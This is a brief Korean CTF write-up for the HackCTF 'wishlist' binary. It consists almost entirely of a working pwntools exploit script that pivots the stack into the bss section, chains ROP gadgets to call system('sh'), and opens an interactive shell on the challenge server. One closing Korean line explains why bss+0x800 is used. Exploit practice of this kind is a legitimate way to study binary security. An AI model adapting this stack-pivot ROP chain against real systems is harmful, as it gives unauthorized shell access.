[hackctf] wishlist

	import sys
	from pwn import *
	if len(sys.argv) != 2:
	print "sys.argv[1] = r : remote l : local"
	exit()
	#context.log_level = 'debug'
	def make(wishlist):
	p.sendafter('input:', '1')
	p.sendafter('wishlist:', str(wishlist))
	def view(index):
	p.sendafter('input:', '2')
	p.sendafter('index:', str(index))
	def remove(index):
	p.sendafter('input:', '3')
	p.sendafter('index:', str(index))
	if sys.argv[1].strip() == 'l':
	p = process('./wishlist')
	elif sys.argv[1].strip() == 'r':
	p = remote('ctf.j0n9hyun.xyz', 3035)
	e = ELF('./wishlist')
	if sys.argv[1].strip() == 'l':
	l = e.libc
	elif sys.argv[1].strip() == 'r':
	l = ELF('/lib/x86_64-linux-gnu/libc.so.6')
	pause()
	bss = e.bss() + 0x800
	Read = 0x4008BE
	gadget1 = 0x0000000000400b03 # pop rdi ; ret
	gadget2 = 0x40097d # pop rbp ; ret
	leave_ret = 0x4008D8
	main = 0x400A4C
	log.info("bss : " + hex(bss))
	pay = 'a' * 0x10
	pay += p64(bss)
	pay += p64(Read)
	p.sendafter('input:', pay)
	pay = p64(gadget1)
	pay += p64(next(e.search("sh\x00")))
	pay += p64(bss + 0x10)
	pay += p64(Read)
	sleep(0.1)
	p.send(pay)
	pay = p64(e.plt['system'])
	pay += p64(gadget2)
	pay += p64(bss + 0x20)
	pay += p64(Read)
	sleep(0.1)
	p.send(pay)
	pay = p64(bss + 0x50)
	pay += p64(gadget2)
	pay += p64(bss - 0x10 - 8)
	pay += p64(leave_ret)
	sleep(0.1)
	p.send(pay)
	p.interactive()

view raw wishlist.py hosted with ❤ by GitHub

스택 피보팅만 잘하면 풀 수 있다 여기서 system 함수의 실제 주소를 찾는 dl 어쩌구가 스택을 많이 써서 적당히 bss + 0x800 정도 해서 쓰면 된다.